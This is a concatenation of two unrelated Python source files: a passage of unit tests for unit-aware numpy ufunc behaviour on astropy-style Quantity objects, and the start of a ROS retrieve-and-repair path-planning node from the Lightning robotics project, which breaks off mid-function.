    @raises(ValueError)
    def test_power_array_array(self):
        np.power(4. * u.m, [2., 4.])

    @raises(ValueError)
    def test_power_array_array2(self):
        np.power([2., 4.] * u.m, [2., 4.])

    def test_power_array_array3(self):
        # Identical unit fractions are converted automatically to dimensionless
        # and should be allowed as base for np.power: #4764
        q = [2., 4.] * u.m / u.m
        powers = [2., 4.]
        res = np.power(q, powers)
        assert np.all(res.value == q.value ** powers)
        assert res.unit == u.dimensionless_unscaled
        # The same holds for unit fractions that are scaled dimensionless.
        q2 = [2., 4.] * u.m / u.cm
        # Test also against different types of exponent
        for cls in (list, tuple, np.array, np.ma.array, u.Quantity):
            res2 = np.power(q2, cls(powers))
            assert np.all(res2.value == q2.to_value(1) ** powers)
            assert res2.unit == u.dimensionless_unscaled
        # Though for single powers, we keep the composite unit.
        res3 = q2 ** 2
        assert np.all(res3.value == q2.value ** 2)
        assert res3.unit == q2.unit ** 2
        assert np.all(res3 == q2 ** [2, 2])

    def test_power_invalid(self):
        with pytest.raises(TypeError) as exc:
            np.power(3., 4. * u.m)
        assert "raise something to a dimensionless" in exc.value.args[0]

    def test_copysign_scalar(self):
        assert np.copysign(3 * u.m, 1.) == 3. * u.m
        assert np.copysign(3 * u.m, 1. * u.s) == 3. * u.m
        assert np.copysign(3 * u.m, -1.) == -3. * u.m
        assert np.copysign(3 * u.m, -1. * u.s) == -3. * u.m

    def test_copysign_array(self):
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, -1.) == -np.array([1., 2., 3.]) * u.s)
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, -1. * u.m) == -np.array([1., 2., 3.]) * u.s)
        assert np.all(np.copysign(np.array([1., 2., 3.]) * u.s, np.array([-2., 2., -4.]) * u.m) == np.array([-1., 2., -3.]) * u.s)

        q = np.copysign(np.array([1., 2., 3.]), -3 * u.m)
        assert np.all(q == np.array([-1., -2., -3.]))
        assert not isinstance(q, u.Quantity)

    def test_ldexp_scalar(self):
        assert np.ldexp(4. * u.m, 2) == 16. * u.m

    def test_ldexp_array(self):
        assert np.all(np.ldexp(np.array([1., 2., 3.]) * u.m, [3, 2, 1])
                      == np.array([8., 8., 6.]) * u.m)

    def test_ldexp_invalid(self):
        with pytest.raises(TypeError):
            np.ldexp(3. * u.m, 4.)

        with pytest.raises(TypeError):
            np.ldexp(3., u.Quantity(4, u.m, dtype=int))

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_scalar(self, function):
        q = function(3. * u.m / (6. * u.m))
        assert q.unit == u.dimensionless_unscaled
        assert q.value == function(0.5)

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_array(self, function):
        q = function(np.array([2., 3., 6.]) * u.m / (6. * u.m))
        assert q.unit == u.dimensionless_unscaled
        assert np.all(q.value
                      == function(np.array([1. / 3., 1. / 2., 1.])))
        # should also work on quantities that can be made dimensionless
        q2 = function(np.array([2., 3., 6.]) * u.m / (6. * u.cm))
        assert q2.unit == u.dimensionless_unscaled
        assert_allclose(q2.value,
                        function(np.array([100. / 3., 100. / 2., 100.])))

    @pytest.mark.parametrize('function', (np.exp, np.expm1, np.exp2,
                                          np.log, np.log2, np.log10, np.log1p))
    def test_exp_invalid_units(self, function):
        # Can't use exp() with non-dimensionless quantities
        with pytest.raises(TypeError) as exc:
            function(3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply '{0}' function to "
                                     "dimensionless quantities"
                                     .format(function.__name__))

    def test_modf_scalar(self):
        q = np.modf(9. * u.m / (600. * u.cm))
        assert q == (0.5 * u.dimensionless_unscaled,
                     1. * u.dimensionless_unscaled)

    def test_modf_array(self):
        v = np.arange(10.) * u.m / (500. * u.cm)
        q = np.modf(v)
        n = np.modf(v.to_value(u.dimensionless_unscaled))
        assert q[0].unit == u.dimensionless_unscaled
        assert q[1].unit == u.dimensionless_unscaled
        assert all(q[0].value == n[0])
        assert all(q[1].value == n[1])

    def test_frexp_scalar(self):
        q = np.frexp(3. * u.m / (6. * u.m))
        assert q == (np.array(0.5), np.array(0.0))

    def test_frexp_array(self):
        q = np.frexp(np.array([2., 3., 6.]) * u.m / (6. * u.m))
        assert all((_q0, _q1) == np.frexp(_d) for _q0, _q1, _d
                   in zip(q[0], q[1], [1. / 3., 1. / 2., 1.]))

    def test_frexp_invalid_units(self):
        # Can't use prod() with non-dimensionless quantities
        with pytest.raises(TypeError) as exc:
            np.frexp(3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply 'frexp' function to "
                                     "unscaled dimensionless quantities")

        # also does not work on quantities that can be made dimensionless
        with pytest.raises(TypeError) as exc:
            np.frexp(np.array([2., 3., 6.]) * u.m / (6. * u.cm))
        assert exc.value.args[0] == ("Can only apply 'frexp' function to "
                                     "unscaled dimensionless quantities")

    @pytest.mark.parametrize('function', (np.logaddexp, np.logaddexp2))
    def test_dimensionless_twoarg_array(self, function):
        q = function(np.array([2., 3., 6.]) * u.m / (6. * u.cm), 1.)
        assert q.unit == u.dimensionless_unscaled
        assert_allclose(q.value,
                        function(np.array([100. / 3., 100. / 2., 100.]), 1.))

    @pytest.mark.parametrize('function', (np.logaddexp, np.logaddexp2))
    def test_dimensionless_twoarg_invalid_units(self, function):

        with pytest.raises(TypeError) as exc:
            function(1. * u.km / u.s, 3. * u.m / u.s)
        assert exc.value.args[0] == ("Can only apply '{0}' function to "
                                     "dimensionless quantities"
                                     .format(function.__name__))


class TestInvariantUfuncs(object):

    # np.positive was only added in numpy 1.13.
    @pytest.mark.parametrize(('ufunc'), [np.absolute, np.fabs,
                                         np.conj, np.conjugate,
                                         np.negative, np.spacing, np.rint,
                                         np.floor, np.ceil] +
                             [np.positive] if hasattr(np, 'positive') else [])
    def test_invariant_scalar(self, ufunc):

        q_i = 4.7 * u.m
        q_o = ufunc(q_i)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i.unit
        assert q_o.value == ufunc(q_i.value)

    @pytest.mark.parametrize(('ufunc'), [np.absolute, np.conjugate,
                                         np.negative, np.rint,
                                         np.floor, np.ceil])
    def test_invariant_array(self, ufunc):

        q_i = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        q_o = ufunc(q_i)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i.unit
        assert np.all(q_o.value == ufunc(q_i.value))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_scalar(self, ufunc):

        q_i1 = 4.7 * u.m
        q_i2 = 9.4 * u.km
        q_o = ufunc(q_i1, q_i2)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, q_i2.to_value(q_i1.unit)))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_array(self, ufunc):

        q_i1 = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        q_i2 = np.array([10., -5., 1.e6]) * u.g / u.us
        q_o = ufunc(q_i1, q_i2)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, q_i2.to_value(q_i1.unit)))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_one_arbitrary(self, ufunc):

        q_i1 = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        arbitrary_unit_value = np.array([0.])
        q_o = ufunc(q_i1, arbitrary_unit_value)
        assert isinstance(q_o, u.Quantity)
        assert q_o.unit == q_i1.unit
        assert_allclose(q_o.value, ufunc(q_i1.value, arbitrary_unit_value))

    @pytest.mark.parametrize(('ufunc'), [np.add, np.subtract, np.hypot,
                                         np.maximum, np.minimum, np.nextafter,
                                         np.remainder, np.mod, np.fmod])
    def test_invariant_twoarg_invalid_units(self, ufunc):

        q_i1 = 4.7 * u.m
        q_i2 = 9.4 * u.s
        with pytest.raises(u.UnitsError) as exc:
            ufunc(q_i1, q_i2)
        assert "compatible dimensions" in exc.value.args[0]


class TestComparisonUfuncs(object):

    @pytest.mark.parametrize(('ufunc'), [np.greater, np.greater_equal,
                                         np.less, np.less_equal,
                                         np.not_equal, np.equal])
    def test_comparison_valid_units(self, ufunc):
        q_i1 = np.array([-3.3, 2.1, 10.2]) * u.kg / u.s
        q_i2 = np.array([10., -5., 1.e6]) * u.g / u.Ms
        q_o = ufunc(q_i1, q_i2)
        assert not isinstance(q_o, u.Quantity)
        assert q_o.dtype == np.bool
        assert np.all(q_o == ufunc(q_i1.value, q_i2.to_value(q_i1.unit)))
        q_o2 = ufunc(q_i1 / q_i2, 2.)
        assert not isinstance(q_o2, u.Quantity)
        assert q_o2.dtype == np.bool
        assert np.all(q_o2 == ufunc((q_i1 / q_i2)
                                    .to_value(u.dimensionless_unscaled), 2.))
        # comparison with 0., inf, nan is OK even for dimensional quantities
        for arbitrary_unit_value in (0., np.inf, np.nan):
            ufunc(q_i1, arbitrary_unit_value)
            ufunc(q_i1, arbitrary_unit_value*np.ones(len(q_i1)))
        # and just for completeness
        ufunc(q_i1, np.array([0., np.inf, np.nan]))

    @pytest.mark.parametrize(('ufunc'), [np.greater, np.greater_equal,
                                         np.less, np.less_equal,
                                         np.not_equal, np.equal])
    def test_comparison_invalid_units(self, ufunc):
        q_i1 = 4.7 * u.m
        q_i2 = 9.4 * u.s
        with pytest.raises(u.UnitsError) as exc:
            ufunc(q_i1, q_i2)
        assert "compatible dimensions" in exc.value.args[0]


class TestInplaceUfuncs(object):

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_ufunc_inplace(self, value):
        # without scaling
        s = value * u.rad
        check = s
        np.sin(s, out=s)
        assert check is s
        assert check.unit == u.dimensionless_unscaled
        # with scaling
        s2 = (value * u.rad).to(u.deg)
        check2 = s2
        np.sin(s2, out=s2)
        assert check2 is s2
        assert check2.unit == u.dimensionless_unscaled
        assert_allclose(s.value, s2.value)

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_ufunc_inplace_2(self, value):
        """Check inplace works with non-quantity input and quantity output"""
        s = value * u.m
        check = s
        np.absolute(value, out=s)
        assert check is s
        assert np.all(check.value == np.absolute(value))
        assert check.unit is u.dimensionless_unscaled
        np.sqrt(value, out=s)
        assert check is s
        assert np.all(check.value == np.sqrt(value))
        assert check.unit is u.dimensionless_unscaled
        np.exp(value, out=s)
        assert check is s
        assert np.all(check.value == np.exp(value))
        assert check.unit is u.dimensionless_unscaled
        np.arcsin(value/10., out=s)
        assert check is s
        assert np.all(check.value == np.arcsin(value/10.))
        assert check.unit is u.radian

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_one_argument_two_output_ufunc_inplace(self, value):
        v = 100. * value * u.cm / u.m
        v_copy = v.copy()
        tmp = v.copy()
        check = v
        np.modf(v, tmp, v)  # cannot use out1,out2 keywords with numpy 1.7
        assert check is v
        assert check.unit == u.dimensionless_unscaled
        v2 = v_copy.to(u.dimensionless_unscaled)
        check2 = v2
        np.modf(v2, tmp, v2)
        assert check2 is v2
        assert check2.unit == u.dimensionless_unscaled
        # can also replace in last position if no scaling is needed
        v3 = v_copy.to(u.dimensionless_unscaled)
        check3 = v3
        np.modf(v3, v3, tmp)
        assert check3 is v3
        assert check3.unit == u.dimensionless_unscaled
        # in np<1.13, without __array_ufunc__, one cannot replace input with
        # first output when scaling
        v4 = v_copy.copy()
        if NUMPY_LT_1_13:
            with pytest.raises(TypeError):
                np.modf(v4, v4, tmp)
        else:
            check4 = v4
            np.modf(v4, v4, tmp)
            assert check4 is v4
            assert check4.unit == u.dimensionless_unscaled

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_ufunc_inplace_1(self, value):
        s = value * u.cycle
        check = s
        s /= 2.
        assert check is s
        assert np.all(check.value == value / 2.)
        s /= u.s
        assert check is s
        assert check.unit == u.cycle / u.s
        s *= 2. * u.s
        assert check is s
        assert np.all(check == value * u.cycle)

    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_ufunc_inplace_2(self, value):
        s = value * u.cycle
        check = s
        np.arctan2(s, s, out=s)
        assert check is s
        assert check.unit == u.radian
        with pytest.raises(u.UnitsError):
            s += 1. * u.m
        assert check is s
        assert check.unit == u.radian
        np.arctan2(1. * u.deg, s, out=s)
        assert check is s
        assert check.unit == u.radian
        np.add(1. * u.deg, s, out=s)
        assert check is s
        assert check.unit == u.deg
        np.multiply(2. / u.s, s, out=s)
        assert check is s
        assert check.unit == u.deg / u.s

    def test_two_argument_ufunc_inplace_3(self):
        s = np.array([1., 2., 3.]) * u.dimensionless_unscaled
        np.add(np.array([1., 2., 3.]), np.array([1., 2., 3.]) * 2., out=s)
        assert np.all(s.value == np.array([3., 6., 9.]))
        assert s.unit is u.dimensionless_unscaled
        np.arctan2(np.array([1., 2., 3.]), np.array([1., 2., 3.]) * 2., out=s)
        assert_allclose(s.value, np.arctan2(1., 2.))
        assert s.unit is u.radian

    @pytest.mark.skipif(NUMPY_LT_1_13, reason="numpy >=1.13 required.")
    @pytest.mark.parametrize(('value'), [1., np.arange(10.)])
    def test_two_argument_two_output_ufunc_inplace(self, value):
        v = value * u.m
        divisor = 70.*u.cm
        v1 = v.copy()
        tmp = v.copy()
        check = np.divmod(v1, divisor, out=(tmp, v1))
        assert check[0] is tmp and check[1] is v1
        assert tmp.unit == u.dimensionless_unscaled
        assert v1.unit == v.unit
        v2 = v.copy()
        check2 = np.divmod(v2, divisor, out=(v2, tmp))
        assert check2[0] is v2 and check2[1] is tmp
        assert v2.unit == u.dimensionless_unscaled
        assert tmp.unit == v.unit
        v3a = v.copy()
        v3b = v.copy()
        check3 = np.divmod(v3a, divisor, out=(v3a, v3b))
        assert check3[0] is v3a and check3[1] is v3b
        assert v3a.unit == u.dimensionless_unscaled
        assert v3b.unit == v.unit

    def test_ufunc_inplace_non_contiguous_data(self):
        # ensure inplace works also for non-contiguous data (closes #1834)
        s = np.arange(10.) * u.m
        s_copy = s.copy()
        s2 = s[::2]
        s2 += 1. * u.cm
        assert np.all(s[::2] > s_copy[::2])
        assert np.all(s[1::2] == s_copy[1::2])

    def test_ufunc_inplace_non_standard_dtype(self):
        """Check that inplace operations check properly for casting.

        First two tests that check that float32 is kept close #3976.
        """
        a1 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.float32)
        a1 *= np.float32(10)
        assert a1.unit is u.m
        assert a1.dtype == np.float32
        a2 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.float32)
        a2 += (20.*u.km)
        assert a2.unit is u.m
        assert a2.dtype == np.float32
        # For integer, in-place only works if no conversion is done.
        a3 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.int32)
        a3 += u.Quantity(10, u.m, dtype=np.int64)
        assert a3.unit is u.m
        assert a3.dtype == np.int32
        a4 = u.Quantity([1, 2, 3, 4], u.m, dtype=np.int32)
        with pytest.raises(TypeError):
            a4 += u.Quantity(10, u.mm, dtype=np.int64)


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncAt(object):
    """Test that 'at' method for ufuncs (calculates in-place at given indices)

    For Quantities, since calculations are in-place, it makes sense only
    if the result is still a quantity, and if the unit does not have to change
    """

    def test_one_argument_ufunc_at(self):
        q = np.arange(10.) * u.m
        i = np.array([1, 2])
        qv = q.value.copy()
        np.negative.at(q, i)
        np.negative.at(qv, i)
        assert np.all(q.value == qv)
        assert q.unit is u.m

        # cannot change from quantity to bool array
        with pytest.raises(TypeError):
            np.isfinite.at(q, i)

        # for selective in-place, cannot change the unit
        with pytest.raises(u.UnitsError):
            np.square.at(q, i)

        # except if the unit does not change (i.e., dimensionless)
        d = np.arange(10.) * u.dimensionless_unscaled
        dv = d.value.copy()
        np.square.at(d, i)
        np.square.at(dv, i)
        assert np.all(d.value == dv)
        assert d.unit is u.dimensionless_unscaled

        d = np.arange(10.) * u.dimensionless_unscaled
        dv = d.value.copy()
        np.log.at(d, i)
        np.log.at(dv, i)
        assert np.all(d.value == dv)
        assert d.unit is u.dimensionless_unscaled

        # also for sine it doesn't work, even if given an angle
        a = np.arange(10.) * u.radian
        with pytest.raises(u.UnitsError):
            np.sin.at(a, i)

        # except, for consistency, if we have made radian equivalent to
        # dimensionless (though hopefully it will never be needed)
        av = a.value.copy()
        with u.add_enabled_equivalencies(u.dimensionless_angles()):
            np.sin.at(a, i)
            np.sin.at(av, i)
            assert_allclose(a.value, av)

            # but we won't do double conversion
            ad = np.arange(10.) * u.degree
            with pytest.raises(u.UnitsError):
                np.sin.at(ad, i)

    def test_two_argument_ufunc_at(self):
        s = np.arange(10.) * u.m
        i = np.array([1, 2])
        check = s.value.copy()
        np.add.at(s, i, 1.*u.km)
        np.add.at(check, i, 1000.)
        assert np.all(s.value == check)
        assert s.unit is u.m

        with pytest.raises(u.UnitsError):
            np.add.at(s, i, 1.*u.s)

        # also raise UnitsError if unit would have to be changed
        with pytest.raises(u.UnitsError):
            np.multiply.at(s, i, 1*u.s)

        # but be fine if it does not
        s = np.arange(10.) * u.m
        check = s.value.copy()
        np.multiply.at(s, i, 2.*u.dimensionless_unscaled)
        np.multiply.at(check, i, 2)
        assert np.all(s.value == check)
        s = np.arange(10.) * u.m
        np.multiply.at(s, i, 2.)
        assert np.all(s.value == check)

        # of course cannot change class of data either
        with pytest.raises(TypeError):
            np.greater.at(s, i, 1.*u.km)


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncReduceReduceatAccumulate(object):
    """Test 'reduce', 'reduceat' and 'accumulate' methods for ufuncs

    For Quantities, it makes sense only if the unit does not have to change
    """

    def test_one_argument_ufunc_reduce_accumulate(self):
        # one argument cannot be used
        s = np.arange(10.) * u.radian
        i = np.array([0, 5, 1, 6])
        with pytest.raises(ValueError):
            np.sin.reduce(s)
        with pytest.raises(ValueError):
            np.sin.accumulate(s)
        with pytest.raises(ValueError):
            np.sin.reduceat(s, i)

    def test_two_argument_ufunc_reduce_accumulate(self):
        s = np.arange(10.) * u.m
        i = np.array([0, 5, 1, 6])
        check = s.value.copy()
        s_add_reduce = np.add.reduce(s)
        check_add_reduce = np.add.reduce(check)
        assert s_add_reduce.value == check_add_reduce
        assert s_add_reduce.unit is u.m

        s_add_accumulate = np.add.accumulate(s)
        check_add_accumulate = np.add.accumulate(check)
        assert np.all(s_add_accumulate.value == check_add_accumulate)
        assert s_add_accumulate.unit is u.m

        s_add_reduceat = np.add.reduceat(s, i)
        check_add_reduceat = np.add.reduceat(check, i)
        assert np.all(s_add_reduceat.value == check_add_reduceat)
        assert s_add_reduceat.unit is u.m

        # reduce(at) or accumulate on comparisons makes no sense,
        # as intermediate result is not even a Quantity
        with pytest.raises(TypeError):
            np.greater.reduce(s)

        with pytest.raises(TypeError):
            np.greater.accumulate(s)

        with pytest.raises(TypeError):
            np.greater.reduceat(s, i)

        # raise UnitsError if unit would have to be changed
        with pytest.raises(u.UnitsError):
            np.multiply.reduce(s)

        with pytest.raises(u.UnitsError):
            np.multiply.accumulate(s)

        with pytest.raises(u.UnitsError):
            np.multiply.reduceat(s, i)

        # but be fine if it does not
        s = np.arange(10.) * u.dimensionless_unscaled
        check = s.value.copy()
        s_multiply_reduce = np.multiply.reduce(s)
        check_multiply_reduce = np.multiply.reduce(check)
        assert s_multiply_reduce.value == check_multiply_reduce
        assert s_multiply_reduce.unit is u.dimensionless_unscaled
        s_multiply_accumulate = np.multiply.accumulate(s)
        check_multiply_accumulate = np.multiply.accumulate(check)
        assert np.all(s_multiply_accumulate.value == check_multiply_accumulate)
        assert s_multiply_accumulate.unit is u.dimensionless_unscaled
        s_multiply_reduceat = np.multiply.reduceat(s, i)
        check_multiply_reduceat = np.multiply.reduceat(check, i)
        assert np.all(s_multiply_reduceat.value == check_multiply_reduceat)
        assert s_multiply_reduceat.unit is u.dimensionless_unscaled


@pytest.mark.xfail("NUMPY_LT_1_13")
class TestUfuncOuter(object):
    """Test 'outer' methods for ufuncs

    Just a few spot checks, since it uses the same code as the regular
    ufunc call
    """

    def test_one_argument_ufunc_outer(self):
        # one argument cannot be used
        s = np.arange(10.) * u.radian
        with pytest.raises(ValueError):
            np.sin.outer(s)

    def test_two_argument_ufunc_outer(self):
        s1 = np.arange(10.) * u.m
        s2 = np.arange(2.) * u.s
        check1 = s1.value
        check2 = s2.value
        s12_multiply_outer = np.multiply.outer(s1, s2)
        check12_multiply_outer = np.multiply.outer(check1, check2)
        assert np.all(s12_multiply_outer.value == check12_multiply_outer)
        assert s12_multiply_outer.unit == s1.unit * s2.unit

        # raise UnitsError if appropriate
        with pytest.raises(u.UnitsError):
            np.add.outer(s1, s2)

        # but be fine if it does not
        s3 = np.arange(2.) * s1.unit
        check3 = s3.value
        s13_add_outer = np.add.outer(s1, s3)
        check13_add_outer = np.add.outer(check1, check3)
        assert np.all(s13_add_outer.value == check13_add_outer)
        assert s13_add_outer.unit is s1.unit

        s13_greater_outer = np.greater.outer(s1, s3)
        check13_greater_outer = np.greater.outer(check1, check3)
        assert type(s13_greater_outer) is np.ndarray
        assert np.all(s13_greater_outer == check13_greater_outer)

#!/usr/bin/env python
"""
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, University of California, Berkeley
# All rights reserved.
# Authors: Cameron Lee (cameronlee@berkeley.edu) and Dmitry Berenson (
berenson@eecs.berkeley.edu)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#  * Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
#  * Redistributions in binary form must reproduce the above
#    copyright notice, this list of conditions and the following
#    disclaimer in the documentation and/or other materials provided
#    with the distribution.
#  * Neither the name of University of California, Berkeley nor the names
of its
#    contributors may be used to endorse or promote products derived
#    from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""

"""
This node advertises an action which is used by the main lightning node
(see run_lightning.py) to run the Retrieve and Repair portion of LightningROS.
This node relies on a planner_stoppable type node to repair the paths, the
PathTools library to retrieve paths from the library (this is not a separate
node; just a python library that it calls), and the PathTools python library
which calls the collision_checker service and advertises a topic for displaying
stuff in RViz.
"""

import roslib
import rospy
import actionlib
import threading

from tools.PathTools import PlanTrajectoryWrapper, InvalidSectionWrapper, DrawPointsWrapper
from pathlib.PathLibrary import *
from lightning.msg import Float64Array, RRAction, RRResult
from lightning.msg import StopPlanning, RRStats
from lightning.srv import ManagePathLibrary, ManagePathLibraryResponse

import sys
import pickle
import time

# Name of this node.
RR_NODE_NAME = "rr_node"
# Name to use for stopping the repair planner. Published from this node.
STOP_PLANNER_NAME = "stop_rr_planning"
# Topic to subscribe to for stopping the whole node in the middle of processing.
STOP_RR_NAME = "stop_all_rr"
# Name of library managing service run from this node.
MANAGE_LIBRARY = "manage_path_library"
STATE_RETRIEVE, STATE_REPAIR, STATE_RETURN_PATH, STATE_FINISHED, STATE_FINISHED = (0, 1, 2, 3, 4)

class RRNode:
    def __init__(self):
        # Retrieve ROS parameters and configuration and cosntruct various objects.
        self.robot_name = rospy.get_param("robot_name")
        self.planner_config_name = rospy.get_param("planner_config_name")
        self.current_joint_names = []
        self.current_group_name = ""
        self.plan_trajectory_wrapper = PlanTrajectoryWrapper("rr", int(rospy.get_param("~num_rr_planners")))
        self.invalid_section_wrapper = InvalidSectionWrapper()
        self.path_library = PathLibrary(rospy.get_param("~path_library_dir"), rospy.get_param("step_size"), node_size=int(rospy.get_param("~path_library_path_node_size")), sg_node_size=int(rospy.get_param("~path_library_sg_node_size")), dtw_dist=float(rospy.get_param("~dtw_distance")))
        self.num_paths_checked = int(rospy.get_param("~num_paths_to_collision_check"))
        self.stop_lock = threading.Lock()
        self.stop = True
        self.rr_server = actionlib.SimpleActionServer(RR_NODE_NAME, RRAction, execute_cb=self._retrieve_repair, auto_start=False)
        self.rr_server.start()
        self.stop_rr_subscriber = rospy.Subscriber(STOP_RR_NAME, StopPlanning, self._stop_rr_planner)
        self.stop_rr_planner_publisher = rospy.Publisher(STOP_PLANNER_NAME, StopPlanning, queue_size=10)
        self.manage_library_service = rospy.Service(MANAGE_LIBRARY, ManagePathLibrary, self._do_manage_action)
        self.stats_pub = rospy.Publisher("rr_stats", RRStats, queue_size=10)
        self.repaired_sections_lock = threading.Lock()
        self.repaired_sections = []
        self.working_lock = threading.Lock() #to ensure that node is not doing RR and doing a library management action at the same time

        #if draw_points is True, then display points in rviz
        self.draw_points = rospy.get_param("draw_points")
        if self.draw_points:
            self.draw_points_wrapper = DrawPointsWrapper()

    def _set_repaired_section(self, index, section):
        """
          After you have done the path planning to repair a section, store
            the repaired path section.

          Args:
            index (int): the index corresponding to the section being repaired.
            section (path, list of list of float): A path to store.
        """
        self.repaired_sections_lock.acquire()
        self.repaired_sections[index] = section
        self.repaired_sections_lock.release()

    def _call_planner(self, start, goal, planning_time):
        """
          Calls a standard planner to plan between two points with an allowed
            planning time.

          Args:
            start (list of float): A joint configuration corresponding to the
              start position of the path.
            goal (list of float): The jount configuration corresponding to the
              goal position for the path.

          Returns:
            path: A list of joint configurations corresponding to the planned
              path.
        """
        ret = None
        planner_number = self.plan_trajectory_wrapper.acquire_planner()
        if not self._need_to_stop():
            ret = self.plan_trajectory_wrapper.plan_trajectory(start, goal, planner_number, self.current_joint_names, self.current_group_name, planning_time, self.planner_config_name)
        self.plan_trajectory_wrapper.release_planner(planner_number)
        return ret

    def _repair_thread(self, index, start, goal, start_index, goal_index, planning_time):
        """
          Handles repairing a portion of the path.
          All that this function really does is to plan from scratch between
            the start and goal configurations and then store the planned path
            in the appropriate places and draws either the repaired path or, if
            the repair fails, the start and goal.

          Args:
            index (int): The index to pass to _set_repaired_section(),
              corresponding to which of the invalid sections of the path we are
              repairing.
            start (list of float): The start joint configuration to use.
            goal (list of float): The goal joint configuration to use.
            start_index (int): The index in the overall path corresponding to
              start. Only used for debugging info.
            goal_index (int): The index in the overall path corresponding to
              goal. Only used for debugging info.
            planning_time (float): Maximum allowed time to spend planning, in
              seconds.
        """
        repaired_path = self._call_planner(start, goal, planning_time)
        if self.draw_points:
            if repaired_path is not None and len(repaired_path) > 0:
                rospy.loginfo("RR action server: got repaired section with start = %s, goal = %s" % (repaired_path[0], repaired_path[-1]))
                self.draw_points_wrapper.draw_points(repaired_path, self.current_group_name, "repaired"+str(start_index)+"_"+str(goal_index), DrawPointsWrapper.ANGLES, DrawPointsWrapper.GREENBLUE, 1.0, 0.01)
        else:
            if self.draw_points:
                rospy.loginfo("RR action server: path repair for section (%i, %i) failed, start = %s, goal = %s" % (start_index, goal_index, start, goal))
                self.draw_points_wrapper.draw_points([start, goal], self.current_group_name, "failed_repair"+str(start_index)+"_"+str(goal_index), DrawPointsWrapper.ANGLES, DrawPointsWrapper.GREENBLUE, 1.0)
        if self._need_to_stop():
            self._set_repaired_section(index, None)
        else:
            self._set_repaired_section(index, repaired_path)

    def _need_to_stop(self):
        self.stop_lock.acquire();
        ret = self.stop;
        self.stop_lock.release();
        return ret;

    def _set_stop_value(self, val):
        self.stop_lock.acquire();
        self.stop = val;
        self.stop_lock.release();

    def do_retrieved_path_drawing(self, projected, retrieved, invalid):
        """
          Draws the points from the various paths involved in the planning
            in different colors in different namespaces.
          All of the arguments are lists of joint configurations, where each
            joint configuration is a list of joint angles.
          The only distinction between the different arguments being passed in
            are which color the points in question are being drawn in.
          Uses the DrawPointsWrapper to draw the points.

          Args:
            projected (list of list of float): List of points to draw as
              projected between the library path and the actual start/goal
              position. Will be drawn in blue.
            retrieved (list of list of float): The path retrieved straight
              from the path library. Will be drawn in white.
            invalid (list of list of float): List of points which were invalid.
              Will be drawn in red.
        """
        if len(projected) > 0:
            if self.draw_points:
                self.draw_points_wrapper.draw_points(retrieved, self.current_group_name, "retrieved", DrawPointsWrapper.ANGLES, DrawPointsWrapper.WHITE, 0.1)
                projectionDisplay = projected[:projected.index(retrieved[0])]+projected[projected.index(retrieved[-1])+1:]
                self.draw_points_wrapper.draw_points(projectionDisplay, self.current_group_name, "projection", DrawPointsWrapper.ANGLES, DrawPointsWrapper.BLUE, 0.2)
                invalidDisplay = []
                for invSec in invalid:
                    invalidDisplay += projected[invSec[0]+1:invSec[-1]]
